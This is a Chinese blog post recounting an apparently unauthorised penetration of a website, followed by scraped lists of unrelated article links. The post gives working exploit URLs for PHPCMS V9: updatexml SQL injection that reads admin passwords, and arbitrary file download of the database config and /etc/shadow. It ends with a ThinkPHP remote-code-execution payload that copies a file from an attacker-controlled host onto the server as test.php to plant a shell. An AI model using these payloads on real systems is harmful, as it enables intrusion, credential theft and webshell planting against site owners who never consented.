记一次期待已久的渗透 从phpcms到thinkphp
0X01 前言
这是刚刚开始学习渗透的一个目标吧 这个站从刚开始学的那一天起,就想把他日下来。
可能是自己的信息收集能力太差了吧,导致一直无从下手 没有进展。这是需要慢慢积累的过程。还需努力学习。
0X02小白渗透
在刚刚开始的时候,一顿乱扫 什么子域名 C段 旁站 端口 ip 服务 目录 指纹 waf都照着网上的方法做,但是你不知道你扫这些干嘛,扫下来又有什么意义呐?
这是我对这些的理解 如有不足希望多多交流
1旁站
旁站就是同一ip上面的不同的站 比如iis 下面有两个www.xxx.xom和www.xxx2.com
这就互称为旁站 你拿下其中任意一个另外一个就是你的了 但是如果开了其他服务 那么就不能再80端口占用
2C段
假如你的ip是192.168.1.1那么192.168.1.-254都属这个段内 这就是C段 ,一般很难入侵,思路有内网下面的各种未授权访问入侵
3端口
看对应端口开放了那些服务 找漏洞
4指纹系统
快速准确的识别网站语言,cms等等 不用你去尝试 浪费时间
5waf识别
sqlmap的参数
python2 sqlmap.py -u "https://www.example.com" --identify-waf --batch
或者用Wafw00f 这个工具
6目录
敏感目录
从刚开始学习渗透的时候思路 找注入点 注入登陆后台拿shell 当时也只会找id=1这些位置的地方的参数然后扔到sqlmap里面一顿乱扫
当然 这个站是不可能有id=1这些这么粗俗的注入点的
然后 就......找不到 然后robots里面看见了很多东西 但是也只看见一个admin.php 然后什么思路都没有 就这样 就放着放着 心想慢慢学吧 总会拿下的。
0X03开始有点入门了
指纹 知道了phpcms Google 搜索一波phpcmsV9 getshell
有一个前台直接getshell???
http://ximcx.cn/post-126.html 这里西门老师讲的很清楚
但是我们的站不开放注册功能 没有前台用户 甚至这可能是一个自己改版的phpcms
那么前台直接getshell无果后 还有一个注入
第一步 得到用户认证cookie
/index.php?m=wap&c=index&a=init&siteid=
第二步
userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 传给userid_flash
并且构造你的sql语句
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26
这里要编码 然后得到返回穿参给第三步
第三步
/index.php?m=content&c=down&a_k=
发包 updataxml报错注入
进行这个站点的测试两天了
框架PHPCMS V9
1思路 注入点是root 写shell 知道路径 可以用union联合写 但是 遇到问题说
、限制mysqld 不允许导入 | 导出
--secure_file_prive=null
2思路二 堆叠注入 在admin表里面加入我自己的用户 但是堆叠注入不可用
8080开放WDCP弱密码爆破无果 爆破了一波目录 没有什么可用的价值
4利用注入点 读取wdcp账户密码 但是 phpcmsv9这里用的是updataxml报错注入
SELECT * FROM `网站的v9数据库名`.`cd_download_data` WHERE `id` = '' and updatexml(,concat(,((select passwd from wd_member where table_schema=wdcpdb limit ,))),)#' LIMIT 1
MySQL Error : Table '网站的v9数据库名.wd_member' doesn't exist
这里报错只能在网站库里面查询 我思路少 求指教 也无果
5希望师傅们多多交流 ,小白我太难了
这是我当时在T00ls的求助 这里面都是我所遇到的问题 所以从注入点上手也得放弃
思路三 phpcmsV9.2任意文件下载 虽然没开外连 但是心想 我把他数据库密码 和ssh密码读取出来 xshell直连 或者拿这些密码去碰撞一下后台的密码也是行的啊
这里遇到问题了 由于服务器是kali不是windows 但是这个cms过滤了php的文件下载 我们构造文件名需要让liuxn解析成php这里我的构造方法
phpcms过滤*和/\ 我们再本机上面测试 1.php空格 1.php*都可以被当成我们的1.php解析 但是这里我构造1.php*不知道为什么不行 试了好久1.php空格才行的
http://www.ccc.com/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520%2526modelid%3d1%2526d%3d1%26aid%3d1
index.php?m=content&c=down&a=init&a_k=
第一个下载的文件 当然是数据库配置文件 查看密码 然后弱口令撞密码
第二个读取的是/etc/shadow/然后hash跑密码 但是无奈 跑出来了 但是22端口不对外开放 。。。
看网上说auth_key好像有点用 于是尝试行的读取一下 结果就是这个尝试 转变就到来了 读出了一个旁站!!!!!!!!!!!!!!!!!!!
都懂了吧 这个用其他旁站扫描工具扫描的时候 没扫出来
然后TK远程代码执行 这里也是试了很久 ban了很多函数 只能执行phpinfo最后直接用简单粗暴的方法
http://xxxx/?s=captcha&Fuck=copy("http://你的ip/50.txt","test.php")
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck
最后 终于 终于
学习之路 少就是多 慢就是快
记一次期待已久的渗透 从phpcms到thinkphp的更多相关文章
- 期待已久的2013年度最佳 jQuery 插件揭晓
让人期待已久的2013年度最佳 jQuery 插件揭晓了.在过去的一年里,有很多很多的 jQuery 插件发布出来,而这里文章列出的这些插件从提供的功能更角度来看是其中的佼佼者.相信这些优秀的 jQu ...
- 一起看期待已久的.NET Core 3.0新的单文件部署特性,记在昨日VS2019更新后
VS2019又又又迎来一次新的更新,这次的重点在.NET Core, 妥妥的更新好,默默地反选2.2,一切都在意料之中. 这次我们来看VS2019的新特性单文件部署: https://www.talk ...
- 期待已久的2012年度最佳jQuery插件揭晓
近日,国外著名博客WDL发布了2012年度最佳 jQuery 插件.jQuery 自2006年发布以来,经过6年的迅速发展,目前已是最流行和使用最广泛的 JavaScript 框架,这主要归功于众多围 ...
- 终于,期待已久的 Java 9 正式发布了!
经过4次跳票,历经曲折的 Java 9 正式版终于发布了! 你可以通过这里下载 Java 9 正式版.JDK9 提供超过 150 项新功能特性,包括备受期待的模块化系统.可交互的 REPL 工具 js ...
- .NET MAUI发布了期待已久的候选版本(RC1)
作者:David Ortinau 我们激动地宣布在4/13/2022.NET多平台应用UI (.NET MAUI)发布了候选版本.SDK现在已经集成好了API,可以更新库,并为GA(通用可用性)兼容性 ...
- 齐博x1更新了 提供一个部分用户期待已久的功能,修改主题后变为待审
如下图所示,你可以设置哪些用户组修改主题后,就会把原来已审核通过的主题,变为未审核.适合所有频道.
- IntelliJ IDEA 18 周岁,吐血推进珍藏已久的必装插件
IntelliJ IDEA是目前最好最强最智能的Java IDE,前几天,他刚刚年满18岁.  本文,给大家推荐几款我私藏已久的,自己经常使用的,可以提升代码效率的插件. IDEA插件简介 常见的I ...
- 6 个珍藏已久 IDEA 小技巧,这一波全部分享给你!
每周趣图 产品经理设计体验/用户实际体验 本周就不写技术分析文章了,分享几个珍藏已久的 IDEA 的「骚技巧」,助你快速完成代码. 还等什么?赶紧上车吧...... 先赞后看,养成习惯.微信搜索「程序 ...
- 期待许久的事情终于发生-微软收购Xamarin
刚在VS推送的新闻中看到了醒目的标题:Microsoft to acquire Xamarin and empower more developers to build apps on any dev ...
随机推荐
- pthread 笔记
1.创建线程 res = pthread_create(&a_thread, NULL, thread_function1, NULL); if (res != 0) { perror(&qu ...
- httpclient 多附件上传
多附件上传实例: /** * 多附件上传 * @param host * @param uri * @param attachment 附件 * @param param body参数 * @retu ...
- Json-server在Vue 2.0中使用--build文件中没有dev-server文件
跟大佬的视频使用json-server模拟后台数据调用,发现build文件中并没有dev-server.js. 新版的vue-cli取消了dev-server.js和dev-client.js 改 ...
- php实现雪花算法(ID递增)
雪花算法简单描述: 最高位是符号位,始终为0,不可用. 41位的时间序列,精确到毫秒级,41位的长度可以使用69年.时间位还有一个很重要的作用是可以根据时间进行排序. 10位的机器标识,10位的长度最 ...
- Spring Boot WebFlux整合mongoDB
引入maven文件 <dependency> <groupId>org.springframework.boot</groupId> <artifactId& ...
- (九)How to use the audio gadget driver
Contents [hide] 1 Introduction 2 Audio Gadget Driver 1.0 2.1 Enabling the audio gadget driver 2.2 U ...
- mysql数据库:数据类型、存储引擎、约束、
1.详细的建表语句 ***** create table 表名( 字段名 数据类型[(长度) 约束条件] ); []代表可选的 为什么需要给数据分类? 189 一 ...
- 2.Nginx基本配置
1. Nginx相关概念 代理服务器一般分为正向代理(通常直接称为代理服务器)和反向代理. 通常的代理服务器,只用于代理内部网络对Internet的连接请求,客户机必须指定代理服务器,并将本来要直接发 ...
- C++第三次作业--作用域
作用域 任何一种语言最基本的部分就是变量,而变量有两个非常重要的特性,作用域和生存期. 定义 作用域是变量的一个属性,某个变量在代码中有效的区域为该变量的作用域. 函数原型作用域 函数声明参数从参数声 ...
- service worker 实现页面通信
sw.js 基本写法: function send_message_to_sw(msg){ navigator.serviceWorker.controller.postMessage("C ...